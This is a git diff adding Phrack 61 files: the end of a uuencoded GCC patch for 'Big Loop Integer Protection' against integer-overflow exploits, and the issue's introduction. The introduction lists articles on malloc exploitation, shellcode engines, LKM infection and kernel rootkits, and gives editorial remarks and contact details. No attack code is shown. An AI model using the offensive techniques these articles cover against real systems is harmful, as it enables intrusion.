+M<FYI;F<@9FQA9R`J+PT**PE.15]&3U(L"0DO*B!W87)N(&YO="!E;6ET:6YG
+M(&-H96-K(&9O<B!F;W(@;&]O<',@*B\-"BL)3D5?5TA)3$4L"2\J('=A<FX@
+M;F]T(&5M:71I;F<@8VAE8VL@9F]R('=H:6QE(&QO;W!S("HO#0HK"4Y%7T-!
+M3$P)"2\J('=A<FX@;F]T(&5M:71I;F<@8VAE8VL@9F]R(&-A;&QS("HO#0HK
+M?0T**V)L:7!?=V%R;FEN9W,[#0HK#0HK='EP961E9B!S=')U8W0@7VQO;W!?
+M;&EM:71?<WL-"BL)=')E92!S=&UT.PD-"BL)=')E92!C;W5N=&5R.PT**PET
+M<F5E(&QI;6ET.PT**PEE;G5M(&QO;W!?9&ER(&1I<CL-"BL):6YT"2!L:6YE
+M;F\[#0HK#0HK?6QO;W!?;&EM:71?<SL-"BL-"BLO*B!B;&EP('-T871I<W1I
+M8W,@<W1R=6-T=7)E+"!W:6QL(&UA:6YT86EN('1H92!A;6]U;G0@;V8@96YC
+M;W5T97)D(`T**R`J(&-O9&4@=&AA="!M:6=H="!H879E(&YE961E9"!A(&)L
+M:7`@8VAE8VLL(&%N9"!T:&4@<F5A;"!A;6]U;G0@;V8@#0HK("H@=&EM97,@
+M=&AA="!A(&)L:7`@8VAE8VL@=V%S(&5M:71E9"X@*B\-"BMT>7!E9&5F('-T
+M<G5C="!?8FQI<%]S=&%T:7-T:6-S7W-[#0HK"75N<VEG;F5D(&EN=`ET;W1A
+M;%]C:&5C:W,[#0HK"75N<VEG;F5D(&EN=`ET;W1A;%]E;6ET<SL-"BL)#0HK
+M"75N<VEG;F5D(&EN=`EF;W)?8VAE8VMS.PT**PEU;G-I9VYE9"!I;G0)=VAI
+M;&5?8VAE8VMS.PT**PEU;G-I9VYE9"!I;G0)8V%L;%]C:&5C:W,[#0HK"0T*
+M*PEU;G-I9VYE9"!I;G0)9F]R7V5M:71S.PT**PEU;G-I9VYE9"!I;G0)=VAI
+M;&5?96UI=',[#0HK"75N<VEG;F5D(&EN=`EC86QL7V5M:71S.PT**WUB;&EP
+M7W-T871I<W1I8W-?<SL-"BL-"BLO*B!.54Q,('1E<FUI;F%T960@;&ES="!O
+M9B!F=6YC=&EO;B!W:&EC:"!A<F4@86QM;W-T('1H92!S86UE(&%S(&$@#0HK
+M("H@;&]O<"X@:2YE(&UE;6-P>2P@;65M;6]V92XN(&9O<B!E86-H(&9U;F-T
+M:6]N('=E('=I;&P@<V%V92!T:&4@#0HK("H@;F%M92!O9B!T:&4@9G5N8W1I
+M;VX@87,@=V5L;"!A<R!T:&4@,"!B87-E9"!I;F1E>"!T;R!T:&4@<&%R86T@
+M#0HK("H@=VAI8V@@:7,@<W5P<&]S92!T;R!H879E('1H92!L96YG=&@@=F%R
+M:6%B;&4@*B\-"BL-"BMT>7!E9&5F('-T<G5C="!?;&]O<%]L:6ME7W-[#0HK
+M"6-H87()"0EF=6YC7VYA;65;,C4V73L-"BL)=6YS:6=N960@:6YT"7!A<F%M
+M7VEN9&5X.PT**WUL;V]P7VQI:V5?<SL-"BL-"BL-"BL-"BMV;VED(&)L:7!?
+M<W1A=%]P<FEN=`D)"5!!4D%-4R`H*$9)3$4J*2D[#0HK#0HK8F]O;"!B;&EP
+M7V1E8VQ?;6]D:69I960@("`@("`@("!005)!35,@*"AT<F5E+'1R964I*3L-
+M"BMT<F5E(&)L:7!?9FEN9%]D96-L("`@("`@("`@("`@(%!!4D%-4R`H*'1R
+M964I*3L-"BMB;V]L(&)L:7!?9FEN9%]L;V]P7W9A<G,@("`@("`@(%!!4D%-
+M4R`H*'1R964L=')E92DI.PT**V)O;VP@8FQI<%]F:6YD7V-A;&Q?;&EM:71S
+M("`@("`@4$%204U3("@H=')E92QT<F5E*2D[#0HK#0HK8F]O;"!B;&EP7V5M
+M:71?9F]R7VQO;W!?8VAE8VMS("`@("`@4$%204U3("@H=')E92DI.PT**V)O
+M;VP@8FQI<%]E;6ET7W=H:6QE7VQO;W!?8VAE8VMS("`@(%!!4D%-4R`H*'9O
+M:60I*3L-"BMT<F5E(&)L:7!?96UI=%]C86QL7V-H96-K<R`@("`@("`@("!0
+M05)!35,@*"AT<F5E*2D[#0HK#0HK=')E92!B;&EP7V)U:6QD7V-H96-K7W-T
+M;70@("`@("!005)!35,@*"AT<F5E*2D[#0HK=')E92!B;&EP7V)U:6QD7V-H
+M96-K7V5X<"`@("`@("!005)!35,@*"AT<F5E*2D[#0HK=')E92!B;&EP7V)U
+M:6QD7W9I;VQA=&EO;E]C86QL("!005)!35,@*"AT<F5E*2D[#0HK#0HK=')E
+M92!B;&EP7V-H96-K7VQO;W!?;&EM:70)"5!!4D%-4R`H*'1R964I*3L-"BMV
+M;VED(&)L:7!?=V%R;FEN9PD)"0E005)!35,@*"AE;G5M(&)L:7!?=V%R;FEN
+M9W,L8V]N<W0@8VAA<BHI*3L-"F1I9F8@+4YU<B!G8V,M,RXR+V=C8R]C+6]B
+M:F,M8V]M;6]N+F,@9V-C+3,N,BUB;&EP+V=C8R]C+6]B:F,M8V]M;6]N+F,-
+M"BTM+2!G8V,M,RXR+V=C8R]C+6]B:F,M8V]M;6]N+F,)5&AU($UA<B`R."`Q
+M,#HT.3HU."`R,#`R#0HK*RL@9V-C+3,N,BUB;&EP+V=C8R]C+6]B:F,M8V]M
+M;6]N+F,)36]N($1E8R`@,B`Q.3HT,CHS.2`R,#`R#0I`0"`M-C(L-B`K-C(L
+M.2!`0`T*("`@:68@*&QO;VMU<%]A='1R:6)U=&4@*")A;'=A>7-?:6YL:6YE
+M(BP@1$5#3%]!5%1224)55$53("AF;BDI("$]($Y53$PI#0H@("`@(')E='5R
+M;B`Q.PT*(`T**R`@:68H1$5#3%],04Y'7U-014-)1DE#("AF;BD@/3T@3E5,
+M3"D@#0HK"2`@<F5T=7)N(#`[#0HK("`-"B`@(')E='5R;B!$14-,7T1%0TQ!
+M4D5$7TE.3$E.15]0("AF;BD@)B8@1$5#3%]%6%1%4DY!3"`H9FXI.PT*('T-
+M"B`-"F1I9F8@+4YU<B!G8V,M,RXR+V=C8R]C+7!A<G-E+GD@9V-C+3,N,BUB
+M;&EP+V=C8R]C+7!A<G-E+GD-"BTM+2!G8V,M,RXR+V=C8R]C+7!A<G-E+GD)
+M5V5D($%U9R`Q-"`P,CHS,CHS-2`R,#`R#0HK*RL@9V-C+3,N,BUB;&EP+V=C
+M8R]C+7!A<G-E+GD)36]N($1E8R`@,B`Q.3HT,CHS.2`R,#`R#0I`0"`M-#8L
+M-B`K-#8L-R!`0`T*("-I;F-L=61E(")O=71P=70N:"(-"B`C:6YC;'5D92`B
+M=&]P;&5V+F@B#0H@(VEN8VQU9&4@(F=G8RYH(@T**R-I;F-L=61E(")B;&EP
+M+F@B#0H@("`-"B`C:69D968@355,5$E"651%7T-(05)3#0H@(VEN8VQU9&4@
+M/&QO8V%L92YH/@T*0$`@+3(Q.3$L.2`K,C$Y,BPQ,"!`0`T*("`@("`@("`@
+M("`@("`@("![("0T(#T@=')U=&AV86QU95]C;VYV97)S:6]N("@D-"D[#0H@
+M"0D@(&-?9FEN:7-H7W=H:6QE7W-T;71?8V]N9"`H=')U=&AV86QU95]C;VYV
+M97)S:6]N("@D-"DL#0H@"0D)"0D@("`@)#QT='EP93XR*3L-"BL)"0EB;&EP
+M7V-H96-K7VQO;W!?;&EM:70@*"0\='1Y<&4^,BD[#0H@"0D@("0\='1Y<&4^
+M)"`](&%D9%]S=&UT("@D/'1T>7!E/C(I.R!]#0H@"2`@8SDY7V)L;V-K7VQI
+M;F5N;U]L86)E;&5D7W-T;70-"BT)"7L@4D5#2$%)3E]35$U44R`H)#QT='EP
+M93XV+"!72$E,15]"3T19("@D/'1T>7!E/C8I*3L@?0T**PD)>R!214-(04E.
+M7U-43513("@D/'1T>7!E/C8L(%=(24Q%7T)/1%D@*"0\='1Y<&4^-BDI.WT-
+M"B`)?"!D;U]S=&UT7W-T87)T#0H@"2`@)R@G(&5X<'(@)RDG("<[)PT*("`@
+M("`@("`@("`@("`@("![($1/7T-/3D0@*"0Q*2`]('1R=71H=F%L=65?8V]N
+M=F5R<VEO;B`H)#,I.R!]#0I`0"`M,C(Q,BPW("LR,C$T+#@@0$`-"B`)("!X
+M97AP<B`G*2<-"B`)"7L@1D]27T584%(@*"0\='1Y<&4^,BD@/2`D.3L@?0T*
+M(`D@(&,Y.5]B;&]C:U]L:6YE;F]?;&%B96QE9%]S=&UT#0HM("`@("`@("`@
+M("`@("`@('L@4D5#2$%)3E]35$U44R`H)#QT='EP93XR+"!&3U)?0D]$62`H
+M)#QT='EP93XR*2D[('T-"BL@("`@("`@("`@("`@("`@>R!214-(04E.7U-4
+M3513("@D/'1T>7!E/C(L($9/4E]"3T19("@D/'1T>7!E/C(I*3L-"BL)"0D)
+M("!B;&EP7V-H96-K7VQO;W!?;&EM:70@*"0\='1Y<&4^,BD[('T-"B`)?"!3
+M5TE40T@@)R@G(&5X<'(@)RDG#0H@"0E[('-T;71?8V]U;G0K*SL-"B`)"2`@
+M)#QT='EP93XD(#T@8U]S=&%R=%]C87-E("@D,RD[('T-"F1I9F8@+4YU<B!G
+M8V,M,RXR+V=C8R]C+71Y<&5C:RYC(&=C8RTS+C(M8FQI<"]G8V,O8RUT>7!E
+M8VLN8PT*+2TM(&=C8RTS+C(O9V-C+V,M='EP96-K+F,)5&AU($UA<B`R,2`Q
+M-SHU,SHS.2`R,#`R#0HK*RL@9V-C+3,N,BUB;&EP+V=C8R]C+71Y<&5C:RYC
+M"4UO;B!$96,@(#(@,3DZ-#(Z,SD@,C`P,@T*0$`@+30R+#8@*S0R+#<@0$`-
+M"B`C:6YC;'5D92`B:6YT;"YH(@T*("-I;F-L=61E(")G9V,N:"(-"B`C:6YC
+M;'5D92`B=&%R9V5T+F@B#0HK(VEN8VQU9&4@(F)L:7`N:"(-"B`-"B`O*B!.
+M;VYZ97)O(&EF('=E)W9E(&%L<F5A9'D@<')I;G1E9"!A(")M:7-S:6YG(&)R
+M86-E<R!A<F]U;F0@:6YI=&EA;&EZ97(B#0H@("`@;65S<V%G92!W:71H:6X@
+M=&AI<R!I;FET:6%L:7IE<BX@("HO#0I`0"`M,34X-RPV("LQ-3@X+#$Q($!`
+M#0H@("!44D5%7U-)1$5?149&14-44R`H<F5S=6QT*2`](#$[#0H@("!R97-U
+M;'0@/2!F;VQD("AR97-U;'0I.PT*(`T**R`@+RH@8VAE8VL@=&AE(&YE=R!C
+M<F5A=&5D($-!3$Q?15A04B!F;W(@8FQI<"!C;VYD:71I;VXN(`T**R`@("H@
+M:68@8VAE8VL@8V]D92!R97%U:7)E9"P@=&AE($-!3$Q?15A04B!W:6QL(&)E
+M(')E<&QA8V5D('=I=&@@80T**R`@("H@0T].1%]%6%!2(&AA=FEN9R!T:&4@
+M0T%,3%]%6%!2(&]N(&ET<R!F86QS92!S:61E+B`J+PT**R`@<F5S=6QT(#T@
+M8FQI<%]C:&5C:U]L;V]P7VQI;6ET*')E<W5L="D[#0HK#0H@("!I9B`H5D])
+M1%]465!%7U`@*%12145?5%E012`H<F5S=6QT*2DI#0H@("`@(')E='5R;B!R
+M97-U;'0[#0H@("!R971U<FX@<F5Q=6ER95]C;VUP;&5T95]T>7!E("AR97-U
+M;'0I.PT*9&EF9B`M3G5R(&=C8RTS+C(O9V-C+V9L86=S+F@@9V-C+3,N,BUB
+M;&EP+V=C8R]F;&%G<RYH#0HM+2T@9V-C+3,N,B]G8V,O9FQA9W,N:`E4:'4@
+M36%R(#(Q(#$U.C$R.C(Q(#(P,#(-"BLK*R!G8V,M,RXR+6)L:7`O9V-C+V9L
+M86=S+F@)36]N($1E8R`@,B`Q.3HT,CHS.2`R,#`R#0I`0"`M-C0Q+#0@*S8T
+M,2PQ.2!`0`T*("\J($YO;GIE<F\@;65A;G,@96YA8FQE('-Y;F-H<F]N;W5S
+M(&5X8V5P=&EO;G,@9F]R(&YO;BUC86QL(&EN<W1R=6-T:6]N<RX@("HO#0H@
+M97AT97)N(&EN="!F;&%G7VYO;E]C86QL7V5X8V5P=&EO;G,[#0H@#0HK+RH@
+M3F]N>F5R;R!M96%N<R!P<FEN="!B;&EP('-T871I<W1I8W,@*&EF(&)L:7`@
+M:7,@96YA8FQE9"D@*B\-"BME>'1E<FX@:6YT(&9L86=?8FQI<%]S=&%T.PT*
+M*PT**R\J($YO;GIE<F\@;65A;G,@96YA8FQE(&)L:7`@8VAE8VMS(&9O<B!L
+M;V]P<R!A;F0@;&]O<"UL:6ME(&-A;&QS("HO#0HK97AT97)N(&EN="!F;&%G
+M7V)L:7`[#0HK#0HK+RH@5V%R;B!W:&5N(&9O<B!B;&EP(&-H96-K(&-O=6QD
+M(&YO="!B92!E;6ET960N("`M5V)L:7!?9F]R7VYO=%]E;6ET+B`@*B\-"BME
+M>'1E<FX@:6YT('=A<FY?8FQI<%]F;W)?;F]T7V5M:70[#0HK#0HK+RH@5V%R
+M;B!W:&5N('=H:6QE(&)L:7`@8VAE8VL@8V]U;&0@;F]T(&)E(&5M:71E9"X@
+M("U78FQI<%]W:&EL95]N;W1?96UI="X@("HO#0HK97AT97)N(&EN="!W87)N
+M7V)L:7!?=VAI;&5?;F]T7V5M:70[#0HK#0HK+RH@5V%R;B!W:&5N(&1O(&)L
+M:7`@8VAE8VL@8V]U;&0@;F]T(&)E(&5M:71E9"X@("U78FQI<%]C86QL7VYO
+M=%]E;6ET+B`@*B\-"BME>'1E<FX@:6YT('=A<FY?8FQI<%]C86QL7VYO=%]E
+M;6ET.PT**PT*("-E;F1I9B`O*B`A($=#0U]&3$%'4U](("HO#0ID:69F("U.
+M=7(@9V-C+3,N,B]G8V,O;&EB9V-C+7-T9"YV97(@9V-C+3,N,BUB;&EP+V=C
+M8R]L:6)G8V,M<W1D+G9E<@T*+2TM(&=C8RTS+C(O9V-C+VQI8F=C8RUS=&0N
+M=F5R"5=E9"!*=6X@,3,@,#<Z,C8Z,#$@,C`P,0T**RLK(&=C8RTS+C(M8FQI
+M<"]G8V,O;&EB9V-C+7-T9"YV97()36]N($1E8R`@,B`Q.3HT,CHS.2`R,#`R
+M#0I`0"`M,3<T+#0@*S$W-"PW($!`#0H@("!?56YW:6YD7U-J3&I?4F%I<V5%
+M>&-E<'1I;VX-"B`@(%]5;G=I;F1?4VI,:E]&;W)C9615;G=I;F0-"B`@(%]5
+M;G=I;F1?4VI,:E]297-U;64-"BL-"BL@(",@0FEG($QO;W`@26YT96=E<B!0
+M<F]T96-T:6]N("AB;&EP*2!H86YD;&5R#0HK("!?7V)L:7!?=FEO;&%T:6]N
+M#0H@?0T*9&EF9B`M3G5R(&=C8RTS+C(O9V-C+VQI8F=C8S(N8R!G8V,M,RXR
+M+6)L:7`O9V-C+VQI8F=C8S(N8PT*+2TM(&=C8RTS+C(O9V-C+VQI8F=C8S(N
+M8PE4=64@36%Y(#(Q(#$V.C0T.C,X(#(P,#(-"BLK*R!G8V,M,RXR+6)L:7`O
+M9V-C+VQI8F=C8S(N8PE-;VX@1&5C("`R(#$Y.C0R.C,Y(#(P,#(-"D!`("TR
+M,#0Y+#,@*S(P-#DL,3$@0$`-"B`C96YD:68@+RH@3D5%1%]!5$58250@*B\-
+M"B`-"B`C96YD:68@+RH@3%]E>&ET("HO#0HK#0HK(VEF9&5F($Q?8FQI<%]V
+M:6]L871I;VX-"BMV;VED(%]?8FQI<%]V:6]L871I;VX@*'5N<VEG;F5D(&EN
+M="!L:6UI="E[#0HK"0T**PEP<FEN=&8H(F)L:7`@=FEO;&%T:6]N("$A(2P@
+M*'5N<VEG;F5D(&EN="DE;'4L("AI;G0I)61<;B(L;&EM:70L;&EM:70I.PT*
+M*PEA8F]R="@I.PT**WT-"BLC96YD:68-"F1I9F8@+4YU<B!G8V,M,RXR+V=C
+M8R]L:6)G8V,R+F@@9V-C+3,N,BUB;&EP+V=C8R]L:6)G8V,R+F@-"BTM+2!G
+M8V,M,RXR+V=C8R]L:6)G8V,R+F@)5V5D($%U9R`R,B`P-SHS-3HR,B`R,#`Q
+M#0HK*RL@9V-C+3,N,BUB;&EP+V=C8R]L:6)G8V,R+F@)36]N($1E8R`@,B`Q
+M.3HT,CHS.2`R,#`R#0I`0"`M,C(L-B`K,C(L-R!`0`T*("-I9FYD968@1T-#
+M7TQ)0D=#0S)?2`T*("-D969I;F4@1T-#7TQ)0D=#0S)?2`T*(`T**V5X=&5R
+M;B!V;VED(%]?8FQI<%]V:6]L871I;VX@*'5N<VEG;F5D(&EN="!L:6UI="D[
+M#0H@97AT97)N(&EN="!?7V=C8U]B8VUP("AC;VYS="!U;G-I9VYE9"!C:&%R
+M("HL(&-O;G-T('5N<VEG;F5D(&-H87(@*BP@<VEZ95]T*3L-"B!E>'1E<FX@
+M=F]I9"!?7V-L96%R7V-A8VAE("AC:&%R("HL(&-H87(@*BD[#0H@97AT97)N
+M('9O:60@7U]E<')I;G1F("AC;VYS="!C:&%R("HL(&-O;G-T(&-H87(@*BP@
+M=6YS:6=N960@:6YT+"!C;VYS="!C:&%R("HI#0ID:69F("U.=7(@9V-C+3,N
+M,B]G8V,O=&]P;&5V+F,@9V-C+3,N,BUB;&EP+V=C8R]T;W!L978N8PT*+2TM
+M(&=C8RTS+C(O9V-C+W1O<&QE=BYC"5-U;B!-87D@,C8@,C(Z-#@Z,34@,C`P
+M,@T**RLK(&=C8RTS+C(M8FQI<"]G8V,O=&]P;&5V+F,)36]N($1E8R`@,B`Q
+M.3HT,CHS.2`R,#`R#0I`0"`M-S`L-B`K-S`L-R!`0`T*("-I;F-L=61E(")D
+M96)U9RYH(@T*("-I;F-L=61E(")T87)G970N:"(-"B`C:6YC;'5D92`B;&%N
+M9VAO;VMS+F@B#0HK(VEN8VQU9&4@(F)L:7`N:"(-"B`-"B`C:68@9&5F:6YE
+M9"`H1%=!4D8R7U5.5TE.1%])3D9/*2!\?"!D969I;F5D("A$5T%21C)?1$5"
+M54='24Y'7TE.1D\I#0H@(VEN8VQU9&4@(F1W87)F,F]U="YH(@T*0$`@+3DR
+M+#8@*SDS+#@@0$`-"B`C:6YC;'5D92`B:&%L9G!I8RYH(@T*("-E;F1I9@T*
+M(`P-"BL-"BL-"B`O*B!#87)R>2!I;F9O<FUA=&EO;B!F<F]M($%335]$14-,
+M05)%7T]"2D5#5%].04U%#0H@("`@=&\@05--7T9)3DE32%]$14-,05)%7T]"
+M2D5#5"X@("HO#0H@#0I`0"`M.#8W+#8@*S@W,"PX($!`#0H@("`@1F]R(&5A
+M8V@@=F%R:6%B;&4L('1H97)E(&ES(&%N(%]L;V<@=F%R:6%N="!W:&EC:"!I
+M<R!T:&4@<&]W97(-"B`@("!O9B!T=V\@;F]T(&QE<W,@=&AA;B!T:&4@=F%R
+M:6%B;&4L(&9O<B`N86QI9VX@;W5T<'5T+B`@*B\-"B`-"BL-"BL-"B!I;G0@
+M86QI9VY?;&]O<',[#0H@:6YT(&%L:6=N7VQO;W!S7VQO9SL-"B!I;G0@86QI
+M9VY?;&]O<'-?;6%X7W-K:7`[#0I`0"`M.#<Y+#8@*S@X-"PQ-B!`0`T*(&EN
+M="!A;&EG;E]F=6YC=&EO;G,[#0H@:6YT(&%L:6=N7V9U;F-T:6]N<U]L;V<[
+M#0H@#0HK+RH@268@;VYE(&5M:70@8FQI<"!C:&5C:W,@=&\@<')O=&5C="!F
+M<F]M('-O;64@:6YT96=E<B!V=6QN97)A8FEL:71I97,-"BL@*B!E>'!L;VET
+M871I;VYS+B`J+PT**PT**VEN="!F;&%G7V)L:7`@/2`P.PT**VEN="!F;&%G
+M7V)L:7!?<W1A="`](#`[#0HK#0HK:6YT('=A<FY?8FQI<%]F;W)?;F]T7V5M
+M:70@/2`P.PT**VEN="!W87)N7V)L:7!?=VAI;&5?;F]T7V5M:70@/2`P.PT*
+M*VEN="!W87)N7V)L:7!?8V%L;%]N;W1?96UI="`](#`[#0HK#0H@+RH@5&%B
+M;&4@;V8@<W5P<&]R=&5D(&1E8G5G9VEN9R!F;W)M871S+B`@*B\-"B!S=&%T
+M:6,@8V]N<W0@<W1R=6-T#0H@>PT*0$`@+3$Q-3`L-B`K,3$V-2PQ,"!`0`T*
+M("`@($Y?*")297!O<G0@;VX@<&5R;6%N96YT(&UE;6]R>2!A;&QO8V%T:6]N
+M(&%T(&5N9"!O9B!R=6XB*2!]+`T*("`@>R`B=')A<'8B+"`F9FQA9U]T<F%P
+M=BP@,2P-"B`@("!.7R@B5')A<"!F;W(@<VEG;F5D(&]V97)F;&]W(&EN(&%D
+M9&ET:6]N("\@<W5B=')A8W1I;VX@+R!M=6QT:7!L:6-A=&EO;B(I('TL#0HK
+M("![(")B;&EP(BP@)F9L86=?8FQI<"P@,2P-"BL@("!.7R@B16UI="!":6<@
+M3&]O<"!);G1E9V5R(%!R;W1E8W1I;VX@*&)L:7`I(&-H96-K<R(I('TL#0HK
+M("![(")B;&EP7W-T870B+"`F9FQA9U]B;&EP7W-T870L(#$L#0HK("`@3E\H
+M(E)E<&]R="!B;&EP('-T871I<W1I8W,B*2!]+`T*('T[#0H@#0H@+RH@5&%B
+M;&4@;V8@;&%N9W5A9V4M<W!E8VEF:6,@;W!T:6]N<RX@("HO#0I`0"`M,30Y
+M,2PW("LQ-3$P+#$S($!`#0H@("![(F1E<')E8V%T960M9&5C;&%R871I;VYS
+M(BP@)G=A<FY?9&5P<F5C871E9%]D96-L+"`Q+`T*("`@($Y?*")787)N(&%B
+M;W5T('5S97,@;V8@7U]A='1R:6)U=&5?7R@H9&5P<F5C871E9"DI(&1E8VQA
+M<F%T:6]N<R(I('TL#0H@("![(FUI<W-I;F<M;F]R971U<FXB+"`F=V%R;E]M
+M:7-S:6YG7VYO<F5T=7)N+"`Q+`T*+2`@($Y?*")787)N(&%B;W5T(&9U;F-T
+M:6]N<R!W:&EC:"!M:6=H="!B92!C86YD:61A=&5S(&9O<B!A='1R:6)U=&4@
+M;F]R971U<FXB*2!]#0HK("`@3E\H(E=A<FX@86)O=70@9G5N8W1I;VYS('=H
+M:6-H(&UI9VAT(&)E(&-A;F1I9&%T97,@9F]R(&%T=')I8G5T92!N;W)E='5R
+M;B(I('TL#0HK("![(F)L:7!?9F]R7VYO=%]E;6ET(BP@)G=A<FY?8FQI<%]F
+M;W)?;F]T7V5M:70L(#$L#0HK("`@3E\H(E=A<FX@=VAE;B!B;&EP(&-H96-K
+M(&]F(&9O<B!L;V]P(&-O=6QD(&YO="!B92!E;6ET960B*2!]+`T**R`@>R)B
+M;&EP7W=H:6QE7VYO=%]E;6ET(BP@)G=A<FY?8FQI<%]W:&EL95]N;W1?96UI
+M="P@,2P-"BL@("!.7R@B5V%R;B!W:&5N(&)L:7`@8VAE8VL@;V8@=VAI;&4@
+M;&]O<"!C;W5L9"!N;W0@8F4@96UI=&5D(BD@?2P-"BL@('LB8FQI<%]C86QL
+M7VYO=%]E;6ET(BP@)G=A<FY?8FQI<%]C86QL7VYO=%]E;6ET+"`Q+`T**R`@
+M($Y?*")787)N('=H96X@8FQI<"!C:&5C:R!O9B!C86QL<R!C;W5L9"!N;W0@
+M8F4@96UI=&5D(BD@?0T*('T[#0H@#0H@=F]I9`T*0$`@+34R,34L-B`K-3(T
+M,"PY($!`#0H@("`O*B!3=&]P('1I;6EN9R!A;F0@<')I;G0@=&AE('1I;65S
+M+B`@*B\-"B`@('1I;65V87)?<W1O<"`H5%9?5$]404PI.PT*("`@=&EM979A
+M<E]P<FEN="`H<W1D97)R*3L-"BL-"BL@("\J(%!R:6YT(&)L:7`@<W1A=&ES
+M=&EC<R`J+PT**R`@8FQI<%]S=&%T7W!R:6YT*'-T9&5R<BD[#0H@?0T*(`P-
+M"B`O*B!%;G1R>2!P;VEN="!O9B!C8S$L(&-C,7!L=7,L(&IC,2P@9C<W,2P@
+&971C+@T*
+`
+end
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack61/1.txt b/phrack61/1.txt
new file mode 100644
index 0000000..ed2484c
--- /dev/null
+++ b/phrack61/1.txt
@@ -0,0 +1,167 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3d, Phile #0x01 of 0x0f
+
+
+[-]==========================================================================[-]
+
+
+         @@@@@@@   @@@  @@@  @@@@@@@    @@@@@@    @@@@@@@  @@@  @@@
+         @@@@@@@@  @@@  @@@  @@@@@@@@  @@@@@@@@  @@@@@@@@  @@@  @@@
+         @@!  @@@  @@!  @@@  @@!  @@@  @@!  @@@  !@@       @@!  !@@
+         !@!  @!@  !@!  @!@  !@!  @!@  !@!  @!@  !@!       !@!  @!!
+         @!@@!@!   @!@!@!@!  @!@!!@!   @!@!@!@!  !@!       @!@@!@!
+         !!@!!!    !!!@!!!!  !!@!@!    !!!@!!!!  !!!       !!@!!!
+         !!:       !!:  !!!  !!: :!!   !!:  !!!  :!!       !!: :!!
+         :!:       :!:  !:!  :!:  !:!  :!:  !:!  :!:       :!:  !:!
+          ::       ::   :::  ::   :::  ::   :::   ::: :::   ::  :::
+          :         :   : :   :   : :   :   : :   :: :: :   :   ::
+
+                    . o O    R E L O A D E D   O o .
+			     
+[-]==========================================================================[-]
+
+
+*PENG* PHRACK #61 is out.
+
+What's new?
+
+    P61 comes with a prophile again (DiGiT!). We changed the filenames of
+the articles (dos 8.3 is dead people!). I got bored of including this
+outdated and buggy phrack extraction utility in every phrack -- gone it iz!
+In this issue you'll find:16 jucy articles; a bunch of smaller articles (in
+linenoise); the usual 100% dumbness in loopback, and some Phrack World News
+with old skewl doodz.
+
+    I admit it, we are 5 days behind the promised release date. Sorry. Some
+of you might already have enjoyed the beta-release that we gave out a few
+days ago to some authors and ircs junkees. Others might have spotted one of
+the many leaked (and modified) versions of these beta-releases. Be warned,
+we dont give any warranty for the correctness of the article or code,
+especially for an unofficial version. Hell, I saw one #61 version today
+which contains articles I've never seen before and a prophile of someone we
+would not prophile :>
+
+TO MAKE IT EASIER FOR YOU: ALL DA DOMAINZ ARE BELONG TO UZ.
+http://www.phrack.org  <-- original
+http://www.phrack.com  <-- old skewl
+http://www.phrack.net  <-- donated
+
+    Phrack got some media coverage for releasing the gps jammer article. We
+received a high amount of emails from .gov/.mil subdomains telling us that
+MS exchange cant read 'this strange uudecode format'. We amused ourself for
+8 month, thnx: http://www.phrack.org/dump/phrack_gps_jammer.png
+
+ __^__                                                               __^__
+( ___ )-------------------------------------------------------------( ___ )
+ | / | 0x01 Introduction                        Phrack Staff 0x09 kb | \ |
+ | / | 0x02 Loopback                            Phrack Staff 0x0b kb | \ |
+ | / | 0x03 Linenoise                           Phrack Staff 0x33 kb | \ |
+ | / | 0x04 Toolz Armory                        Phrack Staff 0x06 kb | \ |
+ | / | 0x05 Phrack Prophile on DiGiT            Phrack Staff 0x10 kb | \ |
+ | / | 0x06 Advanced Doug Lea's malloc exploits           jp 0x5c kb | \ |
+ | / | 0x07 Hijacking Linux Page Fault Handler        buffer 0x1c kb | \ |
+ | / | 0x08 The Cerberus ELF interface                mayhem 0x3f kb | \ |
+ | / | 0x09 Polymorphic Shellcode Engine           CLET team 0xfb kb | \ |
+ | / | 0x0a Infecting Loadable Kernel Modules          truff 0x25 kb | \ |
+ | / | 0x0b Building IA32 Unicode-Proof Shellcodes    obscou 0x2d kb | \ |
+ | / | 0x0c Fun with Spanning Tree Protocol    O.K. Artemjev 0x25 kb | \ |
+ | / |                             Vladislav V. Myasnyankin          | \ |
+ | / | 0x0d Hacking da Linux Kernel Network Stack   bioforge 0x4a kb | \ |
+ | / | 0x0e Kernel Rootkit Experiences               stealth 0x0c kb | \ |
+ | / | 0x0f Phrack World News                   Phrack Staff 0x37 kb | \ |
+ | / |---------------------------------------------------------------| \ |
+ | / | Morpheus: Do you believe in fate, Neo?                        | \ |
+ | / | Neo: No.                                                      | \ |
+ | / | Morpheus: Why not?                                            | \ |
+ | / | Neo: Because I don't like the idea that I'm not in control of | \ |
+ | / |      my life.                                                 | \ |
+ |___|_____________[  PHRACK, NO FEAR & NO DOUBT   ]_________________|___|
+(_____)-------------------------------------------------------------(_____)
+   ^                                                                   ^
+
+Shoutz: justin, nar, muskrat, optimist, _dose and Hassanine Adghirni.
+
+
+Enjoy the magazine!
+
+Phrack Magazine Vol 11 Number 61, Build 6, Aug 13, 2003. ISSN 1068-1035
+Contents Copyright (c) 2003 Phrack Magazine.  All Rights Reserved.
+Nothing may be reproduced in whole or in part without the prior written
+permission from the editors.
+Phrack Magazine is made available to the public, as often as possible, free
+of charge.
+
+|=-----------=[ C O N T A C T   P H R A C K   M A G A Z I N E ]=---------=|
+
+Editors           : phrackstaff@phrack.org
+Submissions       : phrackstaff@phrack.org
+Commentary        : loopback@phrack.org
+Phrack World News : pwn@phrack.org
+
+  Note: You must put the word 'ANTISPAM' somewhere in the Subject-line of
+your email. All others will meet their master in /dev/null. We reply to
+every email. Lame emails make it into loopback.
+
+|=-----------------------------------------------------------------------=|
+
+Submissions may be encrypted with the following PGP key:
+(Hint: Always use the PGP key from the latest issue)
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: GnuPG v1.2.1 (GNU/Linux)
+
+mQGiBD8t3OARBACWTusKTxboeSode33ZVBx3AlgMTQ8POA+ssRyJkyVVbrruYlLY
+Bov43vxEsqLZXrfcuCd5iKKk+wLEjESqValODEwaDeeyyPuUMctrr2UrrDlZ2MDT
+f7LvNdyYFDlYzFwSc9sesrNQ78EoWa1kHAGY1bUD2S7ei1aEU9r/EUpFxwCgzLjq
+TV6rC/UzOWntwRk+Ct5u3fUEAJVPIZCQOd2f2M11TOPNaJRxJIxseNQCbRjNReT4
